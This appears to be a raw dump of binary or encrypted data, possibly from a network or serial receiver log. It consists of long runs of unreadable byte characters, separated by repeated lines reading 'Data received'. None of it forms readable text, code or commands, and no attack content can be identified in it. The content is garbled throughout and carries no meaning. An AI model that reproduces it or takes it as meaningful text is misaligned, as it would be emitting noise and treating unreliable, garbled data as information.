òÌp{ú´où…yÚaÏLÐó8\`XOáèê*æûòÊ)ô8ág•c¾el~<£Sÿ¾d€ZêÎoqB•#UZ^N‚£à²¬·ýÜa{jחviRQ1= °n{µ&"њƒ¶/öB6<8΂ÚÿPmeÕ<ÕxìÔ&‘lM˜ãrcRõé‡é^Ԉ{@Ìe¤ðärzä±ë)6RIcìâÝÿê™4ù²t/¸^µ §`Ò¸I'Æífçà$þ‚æ±%Ø+ÚºdD¯Ð Ñ®ñÒA±¸ßE2ž£;”¡cuÍ ú¿3¨£= ر#­ñÏ+ð(<A3Rì[t(¦ã SI -S·ƒY|zÏ¡Ô—PýÁ]#.P-\¡1Ď13÷´2ŠÂÚ2ß|ïÚ¨$…­(G Yt ÷í@é$ ;‡FëµÌ_"øô‰7™¬)MÔ½šå¢§f ´ÝyßQAqR$$ OØØ ôð8Ç( -=!ñõ2?”„œ7£Œf^Ähª¶Dˆ—N¤aÀå+Ž[íÈõij¼Z;J´ãѸ ³·Š ÐÉrqÊÌì2 ¾yC¸äó¶ ôÄÚ;]ŒO’g Â>Y¯CD3¨·²'ìR¤ÙX Ý:äWZ2„o½ GQÙ[Sß/­!øÍ֐ú;ïU¹6t 1†Š9çë #q(섇ª•&0|ª%ـ™ÿƒ—þ3âôG—î% 8Ô7Jëéà%¢ßH©?nýþ1às›®üŒŸ~×â½]7àÒ¦Á”où³þ¢ÈùP…b± šsºC@›”q%øÆ9M¬ õ’ƒÌÖUp#fó´âôÿ°ÎÏe.¹©Ûâꊛ@w,dZ$?žÕ‘«ÄF|àyQ­õJ·B²À,¦VÞR6Ó~ºÁ»1–…xÙâ¬lJ&™ÁKõ²ç•CrkVUä֔„V!ÃE¯YeBZÏÁ7ãÜ,Gô9Ÿèõ<˜0áÏó•»ý ¼ÎÒú´'E:ßÄÜ÷¯°[î]ôŠH[«—$Ö±Kfqy뚧)ÿ~ÍD¸ƒLî# v:QR¼ŠVr È؁C~ۄý9”. "ÎÏê¼L̯,ìÏtš† ŽØ”XÀ1ŒŠ¯LÕz |!òŒÂ¶dXPóöxDÔ/áÕm‘®3ŒÐ®(ݪÀ·°
Data received Lxa?À¥ÕjTgÊ:¢°æÉñ·<ës1›‘µ²=Sf~F¨"eŒ(¬Iðù„œ´±êdìG‰à’EiÏÄÿ—ýâ’|Q:&.¬âŸJ9Á„>°hݵþ ©¹ ˆï1/išT&¬¡¾ ±¦£CFX å»àù°úôÜåìi87¾‰Ó6ÅÆg ‹í‡T/°rݚtˆTãFÒ°R6žä„ÂG2à×îJ!vˆ­–>pW2A—hºÙo§œÏŒ³5r™äùAËc¡T?=ètï1¥Õ_Œ¤Á–)ԓ”Pð®6¸Cü NÅÅÇSøÿ¥ÙR ¹/m@j¬y|œN¯ÖÉæˆV=qÑ]üÍ7¸X]o_¼•D ·µt‰؉RÕ ÿ¥ÚÒ¿ìÿÌÏ.{·¿•þº`I5¿E0Àõ4…7±Ö­Öï£Ã9¶kÜ·Ž(ÍUU0¥ý-eðA]8afôïªQfûŒäyýv:6éKŒ7 iID!£& æ#F+È7÷º1Ÿ%`ã=Ò/žM"ïè7no¼šÑ™bâS/gMâ±`ÔðÆKy)/”.žMz—Xs€ÈOiHòy83cå¬Òxô‰‚†RÇÌ^mfIövñÁ/U-€˜D"Äÿ¿;3õ’ÏFN^‚žûn‹üáOAÏÃÞð+^TžUß?­`Ú9-þãƒVOr§[Æ$ëÍ]dC!(Ð*O¸]âò[Ï|ÞEÊ©¤Ä+`M…< —ÜCËǝj¦ÉßpŽFìæ¦Ýó¬ûy6³(NHRe—’< ®+a@O«‰úÚÔÀ«×L¶nVÅΑ̺Ý9xgŽZuÒv’qïOÁcÚjà²[H{"–fH@G‘º‚ñÇF÷v Ü%–ÅÝ]{v<ò³ý…piÅ`ßl£ý ~œÜH9Dy>?¢©¶ï5.4ü‘Kh/ÃÎÃ)´ †Ðz¥I`ç\V4Ð7.Ç¹Ä ´‹R‹èüö¢z匟100›¢_9S†­|âÀÔL=‚~N÷^¶ÚdÔ´xø&ÿ‹‘¥E!ñC!ù9Ê¥V/­l2ãC²"ðŸØºÖLÃåúöʒ¬ãÿßÔ%Üwo"Ø T`zH?ÎB>šoXk®O¯T¶ÌÙó’ÕOJ'Ÿå΍VKR‹_7h'“I)¼ðUÇ;XÁXÉ ‰1OCI`*Û ©O?n縦Ÿ‰‚QzC¥Ž’ç z"£+ æW>õ%ÜÄÈB€,ÿ.c[®ú˜~™ÆHÂ|ckw_U>¶Rߊ\ê]é(½ÔY"ꋚ$vø j«6²ÍÚ5(Ïê<GxlÍ yJ“;BHAm½~Q@[8Ï™Ä/•ÐdY.†g‘á-ìGVÎÑ¿>é‘ÄG´Üh0sŸag>AѝŢâ]_›³epƒÜ¨Ëõ§AÙx\ÿ(¿ ?m2‹&ˆöEOvNƒP[$5Ãb¥ar¢ù›yð’„Êi^ž¼a=x¯]²ˆLPjåß}Ènßïïž:Ðô‚CˆÑ tnkÐã‹PÑb|äzBªSñ-´³í˜4ÖKÒh!¨';¿uJòR‘ŠþOˆDÿbrn~²#3šV`²è(³íÁvÿÛ(e˜¸í91Î1 •@­jÖF˜8nØP%E\ŸËláó,‘Ys¥ÜX ^\¡ö0G½À¶žôì0QKf΀%ÏÈ_ÙGª…ÒoÈ")7÷òsŸŒñ ‹ Í V`1xb.uwø ›ßá®\úb|¤–ón˜5B.Ñ0†Bƒ«
Data received ¶ÆMØÛüfŒ€ÕœØ 7÷'Âô{¯ŌÚ+†ÃÕÿ²ÍVÕ¤¥™- . /¼Ñvg„Š¡Ð¥(j8•º+NÚØ\C,£q‡ÔBs‰mïÐÁ©43Ý@EYMցpÜÓgmä‹ÃH6šùy¼µ)YNARÙPêÕy–Ѽ<â%è> ;?¬·%PÆÏÖD°þZ¤&G®ÎÃ&¼uß ªi© ˜·›¢! ·Õ:U¯iâ‘e]Õ®9¬‚|swûÚ͋>ï”) å°AþÒt"Î >·9%­sláóâ’ç(ÊwÕ±i<ˆÛ¦ó)’ ¢ÏLZC?-úgwøÕLbDìû¨A£Ç“¡¤×ÂËÃ)±ÏÔtÕwk™ˆ)›°1&ŽÆ‚^JïuŒP¦¡RG?¦ºKUµÊ»úôðí6v/<HºUQ30„J³üç‡ Ë¡_îg0 bZF„—¸”&ò¨_Ø+hèM+÷ùcEP’6)Õ7çã|*ÕâöD?wßALÌ]hŒ<§YƒRd E‘ŸÞ×2¹M™€üJ¾šˆ³ÞO ¶Å^»*¶>¶ž^íAçÿÈä˜èébÿ)òí-–ë€ÄBÆ÷›#Ù?vQƒËbȊ󈴮Tô2™D0& æSþ]îC¸1Ov(¥ŒÍ&i‚|žñ7gŸž:QšgguMžJZè àåž|çÞ³—Û>J’ éŸé„R%azÊ·ÛIãq§GSJü°Äè˜Zl冸îêÝV¡8EêýÆO¨æž˜¬½‚pjxQ^:Ìt™ÕÀ¯ u(‚Ñ5GDsȝ‰®ãD‡£„ª±þ¼8üÊ¿<þÚԈìêfU¨)ñÍÁÑC´â#º±±Ì÷Ɋ6éúõڎ€ Ď |Í/€æRqAÚyæ’ÿHF:-f0•Z›t^â볈:dú:d·¨ªG[ä×%€„@½fòþi‘Ô–ýÅæ¸/9ø,‘^ÿ÷žn¤ºìõ¬ðwèÔM—Vùîãž”ŠÅ|'™Äîy¾à¶ÿ× ÈŽ×U#ImçÓËKF3¡ÁT¸‹Ù§ç5X¾‘ß,Ç酅÷ w¢’ÜÎcÈQ•„ˍ"}Þ§¬ñª7¼38¥eئnMní›…àÓüƒ+ªoÇþeõ5­’ThÜæé[x¹¼rKŒÖùúz`}ú’T˜z$Tý–L+aÖá̑r.¦È\ GŒ¶CÈ~[qiZ¦ÒÅö®šàéߥòօ²‘|ßÏ dŽ —xŒ:oÝz7&¿Ì“LÓP®…A °‹LôºÚfMž3ñ”Ÿ™.o%û©hɨڐÞõyefóó4^f}Ú×~ƒ­Ò;7|Yù¢WûTÆþ@@Æ=V˜Å†ø›ÿÅÀµ6}Gãëþ0 –}.ï åßÈ˽榲¥À(>ÜÏErSeIGðqό%QåZœÅq5xRúZ®µœ|JÎÛóHø 0÷we‚—4;;TYnÿl’pD!8ÖCÄԀÛvÖ®šM¶UÆ%<5¢yÉ+Äé㤽‚u£ëw e7Ö±g•-µL¸”%x&X}»áNÚùf¥Ô¥,FËSüç Üé#ñ¸Í»T¾ƒ‡I&Â3K'Žà„e#óÿ㡛ŽYàP`>wÓföס©Í±%WŠ¢0W~߉K:(u$\ Üs9ínèÙý®beƒÜך÷øß¼Šð©„íŸÜýыŽÝ¡îj^œHš;*K¥&{üÒÐÌäõ,Dïz´þ9襑0£cF21,¿±8åíÄ/täa
Data received Á‰SXÒMË%ÕÙ9¿m{¶óRÏúhÏÛµÏÈ´¹iÖ ƒ–ÿkÏó_˜­¨7wîðfËëZ¬x;Ù]?º§ÒŒé‘ý‡èÔäQ¹WrÆC¸*U½lX\6ú½‡w‰Óšl–¼[C)õh&‘ ’T»¬úÎӠޕ“ ÁnnöœÅîIá-ËSÆCYŠóšØ-ÀÀXÇ*°‡ŠÉ¥…eiëVÛÅkf”ÁÇdé˜eº·š®üwVý˂D^S³oè˜Ô§™¾±ÓCË ÑU#{W\‚ %T¸N¹¤ÿД‰GÂÊÐx@ŒOqa–¥"øµàq|‹†¹¿4m Ê®GJ„»â¾½¡Ÿ:Ü×ÿ {»@§°Ɨx.#æon‚é¸ò0Kžä<¦jý—AVÁux˵4‰ÌU+™Þ㼉“îeQíÒÛ '.±OžÑw”°Õ –2nŸµžHB#F„íüLø ºÀ0ªË®åÄ ÌžO×òŽÌ—QÏÂCúQÅ¥‡æƒë=ôɾ$âÿ¨Ù…± ·s×ṠᓠG-ïêo.·Dßcëɛ ð/‚$>ûºÚ4ܺփ2?®¢=˜6ʙÓ8T‰s£YžYfÍêý©R7~·ðNR »A>VPb‚˜ÌË7a­ªöêiªø:¨t ǽ)Q/ЏÊ°õ_‚¶ÓÞ°äúé+¦*ûì$DÙ%Œ5·ºiŽ÷¡ÜƒñžllÈük›‹ùqnŽ–µ¸z—Ë©Þb;Rœ’XöR©²&<™QÔÍQŽÍÎÉæC–ªPi¼¦¬Tƒi:¶BYþ7ŽJ„¸ã9{øür¼kÇÌ¡Sð§§ýF þÙ4lþµZ{ï_ ”gC*r‘`Ɖ(ƒ ³ôæð¢Ûºñ‚…å—5ä‡PU8/it:4/$_ÄØìøZ¨v Ê2ÍÍ|Óý ø ôÄç J½a¬rùcÏ$/™K7õX{FАso–*.Å z*áašm¿$³w«€£ÌÕé´— wYØD¨õØ5à:˜âûœÕñ‡sׁªQtrÚëö:˜-÷ÊìNS5rÕÐ:´ãZ’Kµ0R¨È¥°M]~zçcd ™,±—èÆÀÜø,QqÔ¬×9{‚b®òx>{‘¿±ÄâGý.¬Í«¹qÐJo…ïËsMUžõ«`è$0÷¼TS=RU›´â•µ¦U¤9]UÎW™Á,2KKÃöãÅNèá§öµ. êîP;ÐCö'×Ë¥¾*9’iµ[P:¤ó6P‹|·ûiÉôZQ¾6“òh¿ú $ݳ…nr“ÇÇʼn]Äî×ÈÄGÊïª{Eàïëþ~óÜm9ã×x:kU/e®—¨X9Rfm-}lº ®š6TÃ}²ᅷ01…½= (ù €Ëê‚u"¦ÈEZ}  “Ž«·|âèýšÃŸÊ¡v.¬1í‹N“€ =N½Ö+x\4Ú"T‰‚Ú¤¶ØÜ¿•—¯YïlhïÜ÷èaµ¬ŒÙ&WW'u˜Ê ×í±•ÝœIGÏö}4Žõ©—bóª°¡kí9qñŠ Åɜ¼\Vò^ÒðgÀSßµnp[+3Ûø'[Ipe>ôó qJ|1bÖ{Þµ SGˆÈóÖ>5CŠd)”c¡ºÇúà¶0„á{Ü_갓ñVÇD&ÀœšŠ7 ¡ã²Â못UMáÑËß]ÎðbqàXV1ÑYcåNHû?O)ÏéšJõ<È°Ëʐæm¯8q(¥? ˜¯'åâ
Data received (]؞ºä¨üû8÷Ũ.2Hû£oùÇnÍ[ŒP¿P±h^³ o½áöÁÊÔÉáïAï·ÊI‰zq‰K¶ég7"þÒR»»~‚¶(3”ýa0`•ø¿/˜ìs<v¹G#g(e‹ÊºcŠþÒ«'"Neôô >•ã'¯«c®Ã-Kõ68²y;Øÿ¨Ì¹»[X›Û@N*lü«ÝJ­nUš|;ÿB©tÇoù¤Cï «(žœío›'þW’L\•üÄ¿v?AFIÖûP^G¨Õàd3Õ^Éi+e®¹þDEŽ?j{äBŠÉh±KâÌ[%.®¨Å»Ù?Œ>-ˆ)¹Ë¦”MµyÄ.pCź˜abعÇ2}ÒRú¼(5&Ά èï3Ѥaþ®Ì9ö¹l̜¨Î“L~閉®·­àm éå XìӋQØå‚Ò©Þ7Œ†*ì=C{ÑÑáMý‰à–¾€ì‹Aů|ôn3='ítõdlši/وÌ> °ˆ}õ…L–õ‹¨häâ´ñg@Àû$åz¼Gh­±ôøS€|pU\~px³{RÇ:æ{¥GüAûp¿Z/pôÙ¯„²Ÿ¹»x.6À-OÐ!ÒÍõœn&k[3¾µûªN¯”…”Iª¼ƒááÝI ÿŸX‚¸ÖÏèËÀ4sqômŲ7DŽú¾§â{$oƒd¦"6ŠÁËÆmŽ Ì ;1ïRö«¥©ÿæ@#â=Àµqîé8•Y%í·²pÆ{£³™.¡\üG=nøykÇM}Hÿî³ï·1Üõ§éE>(ªÓ%ðÍÎìs+e,¡Á/Šë uï¡Ì‚ë í˜î Yí‡j!\Qˆêìÿ2ºðw‚šÒ¸#n Ro~äsÚA £Ì§(„ðäG”³ ­£qäW7¡¢eF]I·°pPöQ/» Áa÷ÞvÞl7%ñšö_É$Òðö ÷ p—Z)&x0g@ ~‡²×‹g„á¬Ò_ŽV#ùg©„LY–kX,MŠgǾ 2`«kž”>ԍ¶ŒfكìåK׬%ëD’i¤æ¯çn †Ê#MÉPŸr-bG"—2«‚dÆô#‰ž §t€ãõëÊcÛÌ:dZ•[}¤]Cx`}b·eDn ÚÛC¦³ã 1ښ?´<E|'Ä$Øíܨ5ÒÃgñJ^úOmLqTA•!¬°æ6¡e=¶æܽù˜‘™ÀáÝ:GËÿ*´>Öãœt;K@к¿'j±“Y̵µ;óê;‡‹îdà“ 3m0ØÙa˜b‚H•qöË]…€0Ç |nmòYxÒPB¢G­É?"H*V—–_ .z(Y1?÷²N³ªFÑÛ1/óű©[ŸÑ?pnzê3•ñêt*z^fŸ¼¸ä\Œ÷ÊÑJã5·Tt(Г ¢§ ZC¢JñãS|FkÖé  ǯ–žá@IF‹v»X8,¨Jt¹—¢¦}âê𤇣…' ´ÍîiëÚñûG*_ρë}Íøßâ]š*åäZÏëP-Ôh¼ÎìrZrAèÔ×X@šp§O¤ ¢”^GdÎbÀæ^¶Yn Ê7»€ŸÎmª6í MR¾ÿLEMt<9éiˆY¢‚c0ãÇ£“¬æËæ|3ò$õ0ýý/òÉ€%÷y“1®¸MÏ,1§xyI¢”vŽjWt\±nï9ÔöÎ*õ„ì øhKýó½U£ÝêЫi M†['©‰®F&&àQ~S?‡5L^˜>­4똼AƒA‹ƒÚ™Ö´¥
Data received ©BOßt³·âa9ÇFߧ“Ó.n"y{íî 3•Ò"Æþº¾¢ ‹2Š…VÇ»+%TP”Y»Š+üQ—œa½–ÞÃ<ÀÅ$ãÿÁ}<Î<ƒî3ÿ+0'¼(&bäݘ²´Ïö¨>7÷ “Î0P,b ¢k&V²`ʼnž³¸Œã݀ãâ°ZæBŒ ¨ÀîwBÐI·×«ƒnNœÞÃxh“.¬MšmÓ¹ƒýízÎח¶&~ÎÈïæÅD‚8Þ´|"/‚ªŠ&tùuÄPÜ°ê{€æòÓrâÆ ~&„ù<%o5é˜Ðʹ¥Â<Ƨ#Ë!—ÍÒð\VéÁüà'å•%én/š 9 ‚@€Itq¤ÿ¨ ÚÙp‰ß @¾ ·9[± E\󚨟¢ýÖ¼%éˆnÒ$n¾N+1ƒu:eN”y6®1y P唻n¸qjD«b$yÞÆB0laLR3í¥óƒN…v¾§ŠT*r›f Ïß|€—8$å~Âð”Ö”‘V‰Aúÿ¸ÈñùÑéõz@¢kì=ʔù¸lìÿ3h‘g†`´|$ÝÃ.HÀŒ° À*8¶ØŸàÙê54"o1o ¨~[I-H!⺷"±?xÓÓîa¨ö­¬™E1:²Ÿ¼y16>óá7A{¤„™ýè"NoÿoÿhUêL ·þ7 JN߶‰,n«ý›è!n]ÒFz^o̍Qp‹HC²¬¬Ía¼9Ø'VÀ ‘[üöK²ù|²eb@‹b &%ÚùEýû¸pø[ŠLðûÛÊH«9« ±Ÿ»é@¾ý)e©Æ ÷E®dmK‚~ŽIÿÀ£ u{÷…f›öÕÁ.l ggUƒûýÉeÈQ³½)GÆ,{½2‰Llø5Š„'[ë¬×ÑYÕi‡ïP¹›Zj]{D&¦4>d}Ÿ¼hk$*Œ\}•7ä¦aq”`€*bwÂÞ0ðþoÔà+硶³Ì”÷aDí­M9­Q™ù‘2‘*®²×öøGO6'§Î®Ôz«®sþ¼`Í<Fð+@¦eS%!­Xa1vg»;| Ä垐"Ø'Ô!]mЙ„9&åÕawà¸]ߍڵS&7¦ ÙLx‰MbŽ*€ƒ£.­ùÚwÌwK·y0Daë<¯©iT`AZO Eöh!&Šµ| ™ÚM¬§á»9œIòÒI4sÑ/º€!v`ÉÑ}vO‡klìtOˆ_0—ƒ¾»-6ˆU늕}¾H+0Åc­ÙL2^?˜º§©“Qü׳h¶øúßÐÌ{-©6åÙ*Íé%9rAÓ&°P­“تy6fùO"¿½ºcÊÙ Âó1ØfÞÕ}‡:ÿ„L7,¬‰ðý•ãtÍñ—ý Î4„z^§@mö‹“ÿà¹`Ý9_ŽQT–XYҖö@¯…6ΩC"£°“?,ãiÍÔßNMúMøÑÌÝQ`›`/ŒSž…)þH… #.MŜT¸‡Ì´éd;ÜWd€Nìޛž,hû ¥€}.ý–…LÁ߲¼©6ÀŸÙwa_yîÕˆ·¦›”[½¤lö…¢Uæ+öY;o§·WE‡J6c«ÌwИˆ†(T5W.Ý©–#L×¼ô×ïn—ø¸m7ˆQ » êVònoˆ7fÝ_mŠëUÊhï´B<ù!ѦoѤci‹œ ‰¹Ü3˜`쪚Weø‡é>ª’u‹žE.¢Ì;J¥@¥:úRôé ¦Ï4ú„¿;gMÒ $*ýŠoÈꅗ®HûSõ4U
Data received P
Data received ¡ •À)€U ÑxÄ À5²êô¬ò¼”Q¾tZ¨¨Ýæ„è[Í×dõpW§‹[îomyÃhÔ.2Bܘ1:¶Ç¹Vn4¦×5³ÿ\¨hý·žƒÏ[ ¹¡<\î“)y’[@Ql‘ÍŸß48L…YÈÞÓ)”Qè¥yŽÿ´ |4f\ɘò>‰‹ Ñëá¯8ø4‡] V@Ú0mAµ9, `ü)23¾“]w'óXúb|œ·ú g?¬D˜>ÌcÁ®È59(êù[¼uѯƽý \­ð /ÑJ ¹ŠgKµÏ ØÔëšÔ'7YJšõ;‚ˆâ.VøLv.UµV–Û¸PH÷ï!Ì~ Ñ´#g3å$¼l«‰U*¤ b¥ðçL²–“óâ_ÂQo™ÉKݛ<¥‚Ì$Rd·—ÜÇÝ¿ÊÎ~œƒé›(쌒 ᕠc*cj)Ԃ§¸&©•$õ=óÜd¸b0á^lÑëOe¨’m)ˆí„z%g@§¸î¾û´¤ÎªíÕãìû+n² gR® +Õ–aоY¯sÁ«Øp•V~€tW¦_ •I «œ¬¨ŸnÙíŽ ZŒX· ßBS]68˜ ûE«£Ývg’‘:d7ài‹4|ªtÚ,³Ð¿½;¥snxÇÀ–ÚKÁà•a1†qoýê<^#~¬H T¾ LïÐu8•c÷€¼ñ=£q oKܚlbàܨšKMú§( ¾‚lxùy­3äÖ£–´æºg¡²„ty•º¹ö*)aR`g®—Ê8¹t´‡=ö–U”§T1ô¶¾×»OQ£˜Ûu‘P<§ß9›%¥·k/ sJƒÒ²øãCñD°­¿Õa7etÀwÏè9 Êå”X@Êà¯àç,Od‚_øÌ=ÌA¢,R`¸ö?Eò‘ºMŒt¯›©U‡A ’ o`2}PÖضOj÷:ÚH´Õž&+ZwÚwˆE§wJ›>çÊ|n-&Ü"³³³øgóc5êüÒíÖ÷ß( +È_ŸFL Èùà»Úöº¦ñMû8ÄgXµõãCöD(+&´í9Šè[¶ØGƒËÞì$$UE,®wà~±õ †$*LnU›Êsg(ƒØ`8jm#Ãíå yÙÑðbS¿cTòbŽì1…ñ,R¢ºÍê±ûMòáJšgù XŽ(OàÀ&¸ mú OöÓÜú"ÿkVÁ‹@W±Õá—i‘/)3tVRƒßh.™gÚ$ÐN .îz¿v¹æ2Iø`xðÀgwȶj†BX°ë¡9u0Šø@¸öd¶Õ ÈÅpy»–Üã?ô55 ®9ø‡>>="ö×à#û÷ÉÌ)§‡O#ƒÅeû¢,ÖÄÕɕîÍYf~w¤‰Ý>©@jC¬|h¾›AŠ‘®ðèá¦üù¯^ܓwûß=8î¢B¼º)ób—QZ$=ÓÈR­ø½rŠZ©6qŒOô’@º<Ty˜jÓÙî›ãË®ÿE=o¶*¡–E1¡vÈ#ݟÜép¬R†¯YŠÑ¸5ê)µ7Z<¹­.ì~PèsïÞ'…ðÓď [˜¶Œÿ‚ãhÓêvnÙÖ¨EÌiŽ#q&Aó ”£¢2½ހ°E u:ÄúúµµÝÝ!‰Ù?}£œWAr{ÿÃ;Öÿîæp´9…-͔§VF¯ ú ŒpJÔØد5ШTu—}ý˜6bn.P:] ö«ÔÑ?€Hš¶~bw¬ ÝaL
Data received æSdúŸÐڜSr¹xÆ9ÎÚë'UÎÝQã6FÉeԄeÏʥÇ굫ÒCJ-ö·û¼t£W™ÝiÚ£r â¨r8¸%¼«J¾ÊMÏéæ§Õ ‹#ƒUgS¹È>ï¬.ë­/Çlضþ‘¹åqǬ6B[ KC†Añ:P¨ÕP§çp©ÏöLok2óÝöÉè{›ª g܃y# ÃD’rùWŊ‚%JÖdb’ï*Îáƒ|%#ŽlqBuS¥œÕK›ƒüÂ?c¢ÜSpúž|3‚$¾Î±N=ÜË¢TÇÚù ©°æpÔÉÙû÷L´{¦ÐÎÔ¤V[CÿïhòdøæNóEü ï-ó°éHg‡-ɔÇÙd™þ¦8iL†í‚þCeuåÔö 5Z¡Ë@tÞ¿-NKÄ~bÀha{Š7òc渷þié¡Ä›ý3@àÙ´¬e”;Í ¥<5~D ó² ڞ-«èðòœ2ÅEzþ2w= R%&ëzGäÝ™©ú«†ÎÃÁó•ÏpP:d¿ê»ðêVl® ‚5”µYO–²‹ŽõüŸøBœY³ž¡þql¶Œ µöügª±Ì ׸ÄDÆâVK^ê¨ÔKÈ:kÕ¹…cï.Ÿ/äB¾ë ¯_ûèÝV‹†›–¦Ï|ƒ6öqv‘nC¯;++´P IàDô"›h@#\²rjú½ˆ^…¼@ŽZêJEŽ¶N wJ·OäSrCƒS/i²+ítQSLæþè/ÃޜŠ P O–1«áù€÷±¾÷è]ÎN³ÚÈdfÁsÄ-9gË+sGté6Tæ­Ô¨}…0¡´¨pªÉ$C#ÔÇ0èçä+ÝR SÌ ìÔ ßb„Ù«xó¡m3²ÐÃßãf ¢P$?Y“ƒ²ªŸÖøh9G± Í÷îgËé×i .Ïøk8}ª˜ÍëZøÔäŒúÐx׸] BhtÙáè%Ž6®b'˛Œ]NQ-Jg0>M(¤ÙpUè\ᎍ2’‚¸ õ^AóËK#ø,2:ìåЮ9c֊ճݡoqäa¿¦ÇZ »&RHl¹Å°eêÙZ£ç„@Úª_‡·^Ã$F'Y.¦Gwˆ’ÈSãV ðˆeƘõo±ðR«Hñ¾‚@ öóÓe÷¼yƒq£-{sÿùò3Ïèls5”m»)åú@Eà¥rþÆÍègNÇš{³X»bU|hœÐéZҏR®ÅO œ“ ¼Ú3ÁÀ¯Wùo²®n”|PD-<g´?,:-ÙqA 3»–(³­ð?»Ð*­~UgÆ @ ½3&KÓ BÀÄ6Ý)B!5Ö>ˆÊŠ&ªŽ9_JÊÑSÈÜQ÷³¹GÅAa]¦©óvnÎ £!’Hki‡ÊGà Á‘ŽRQœ˜ñ»½066w‘SĪØyLèˆ îý± @è–W ½4ly5GBŽŸäy3:ô¥’ƒ¶íÂf&1w´óOz+7qþêG0C´ö=JÎF­ž<@Và@M}-R{†3~ÛU§õξUYX,?*½(=ÆÍKæ¹å듢;yã‹fpŸ¡(òh\æ%¦h¸;õPâ±Ìî!"@MJ< "+ÒOðÖÎ^Ìx÷àˆñ*1^ãRæ‚ÇH¡^Í@ ×A.œ@½n@ü 7|2{ë‰Ï $ Ÿ¡=øïb~ˆêZ±Ø9#ÁÇ~áH—­€…V|»hÁaIèïUês¥[âd»jøŠ$é"aÞ÷†òŠŽc¥ÜöSqí-±ÈoT½׾ݽ7ró"{…¡·Öêc9˜AÛxÊGlSß³¢GȀ€Í
Data received ÇÄjÃE òÛ¦µóìâm&·-–܁)N1ÔV¦Oûƒ;怡¬ûM߶V–œsŠ?ZΣ‚ak$0”š4òT³Q?-QÝÕ¢¯¦©Ž”§ŽZ#>bÙº¾õVd»#—|C-±[æõŽj×¥IQD+FÛ¾ù-Öø//.9%«ãe°Ò3H2mãÞ_¡ËÖØÒÀ1ÌAD"ñØ=jhZ…ÖV/ã±÷VªscÑ-íæH¤šLo%]9¾¶³B<Âv(¾@~òzͬˆVVÿMR+×Gh© §ØÛuûžEO:Έ¦4Àú%Zn Gô—]öºÚcÇô=¸ïإãš6‘ÂÕyÐhÈK7v÷–Æz±ju‹!‰Èå>±Ääò(†”>é9Þè¶ÐöùõWàüáqÅKÝñt…ãýÞÊçÆIK€ÁÂüH3/u鼌Þ5CÃ<–í£œ¿vóv‰á È}—ËIă)/°‹J…2% †ŒÚ oÈÊ%²·ÝAŠÌ—²Ç@ t_WãlŽ0²o#—±i¿ =ê8úx°Uʏx9t>9¦Ó·LÒÿ$š4f’p•¼Ûõ¼Ã ãՋ³ŒÏv y8Á²Ø}ÕºÄeÆà¹ò­yë,콯ÎoB‰-)s\²ƒû‹­<÷²݊h§b_#žñFgèCÔc´ò2ßnåîøµ>þgå¥ZIÕ÷Ùr¢£ÙÙºí”k‹¨ÆA†ðB›\˜Ïß*÷ÜÈp—¬õÈ4E”Â{è™,Q.]Nô§è%î±VÁG[Y*ó"Ê®’°×{B‚SĈÄH&°M¡w†ÆÖ¿á;1ò)-¡)6Ø G `xãÚg[z@˜EQks£-B qB3²WÑ¸Õ ìT0¢ €a,“µ«Jî¬-6 ¾ÎXGÞ)‡'e_VĔÙ7f"CqŒß´ûãôÚÃ2ŸÁ‹¾Iôé~ZGx$`aáŠØˆí-¦»žïҕ”Ñ̝J+ðÚ>ςÙÅé»*sIwÅå±8ð§&Löñ‰¶,ÞÄL´ÿ.c|óu/‘©i܎vDmm`hø6™åÙ9äÿ ýûv(ÁK¿/LÓ_×~Gd[+É+‘fü´”â Zën KvHR>¸ç¤Ä³õß "·Š|³WamôÆ+ÊÈnþ 1ÜÊõ¶ýTÈ ƒsç â=½O)Þ)=Šhˆ §Õ*BR£WMezMõYyà9<cÃö-ðA"òÚOÍȋõupÁOiÛ*lò2„¨{x¦Õ’X/˜ì¿þÀ"æö·Ø†‘"ù·ø1VQX¿^QŠ´!+¡Áª³Òԝ}œ¯<I¼Xᮧ”X–t„úHè$¶6Ïë$œ”YŒ¿*íC4]ËÚncø2an R·™´´6ö¤=֕´Œq"¡‰®ùJ&Lêx¼Ò^•qs:ȤTJQ 1L¸ò:¥Rc£FC£éb³ã*Áä¡CÐyýfDx¨§?o"g,bø†ý Ä¿, ¬¤¼L¡¯IX•o6—À¥º¦ð'ܱ“ËÅP;¿ÇÐCßk)IA‘h/KÈz.Þ ¯–lFإƍ/83×ÜP‰[3@âx˃8ì)Nâ¤ÍœJëÁ&ûς)keuâ”ĪøµËÒ¡‰ÕžFEøxQ ª-¨ ”pŽQ5ý³¦nLmÓ¬›~´,׊¶)†ÇCvª n¢{,c NõŒ{tÃT,=µ ¶úª«ÈþL«æ–nèõ¨>ùrß²þ9kԑMÎîûŽÔÞ¸+oULÃwÌ]¸~¤›2•¹¶îýBïæ
Data received ¢þ‹qI0Pvõ0þퟻS¡RÄ¿±er6x¤‡¨uw*s¡Ì,Y$r_•ÚlO”ì¯l(R'Äp¤r#η 1ˆÃ pW2@onÐË¥!¾Yeôg b#³š}2erÏFrd;ƒ ¯:'^†Þ.í˜l¾6¥ mÀ®§5?þ+)¡¶ÆzXSgÄí…E¿Ô!Z5p¿O­þ.ó 0UÃ3Ø¢´yL%oûýb}dt¢{]i‚™£)€Ë-Ù%›N™ã¸b½„¹EÎ$æ5|pšã¥›G™‡œW[21%¤ø•ý«fÅ ó<{¤îd1EÂÈ[…Â՗Š‰ÅÒ¥\3?[¸]–€ççO)¾gï˜9˜ôœMB@ÕúR…°Úï9˜ˆ¬5ÝíÀ2„O…,l‚»ÅXƒ|˜üPtà Ï)_ƒJù}XÛzex(•‡¼ÊKWKåzñ®{%ŽìÃàb®×A;–Ô^¬êŽS?åt Þ 𵸏[Ô ÍA»-Bö¶8éÀ4Gƒôddê–×[Û}7ºÅ‘B/|^ÅX°µBŒƃnOÈñÖÆb f ¿9×á×–dÀor*¬%䜺½üéw‡ß¿•v¹¨&VšS¿˜Ô—AÖP©-ñæ©é æCw,¨iÅEEÙd.Ð çM_í#©º+Msv<ŸˆÄË)Ú(ÇN§íßþm˜Tp%½XÝ—f¿ç¥˜4QëRÐzl>;÷>wlˆš0‚l:ya0 ‚[÷X1Ïõ4´=zÃùçø€®np{…˜„J ?Ê¿%»ì(vvàœi ñv æåÕ.·ÇUQ+ÍíDdÏÎéôÁV´Åhß|4nÖjüeˆÀÒ ZG߇j¿TqɆÑò3tɉf ÔíǙ &¤>góþö‚öÓõ–þ}l@<Íh/̸ÃK™GŹkÍ×/ 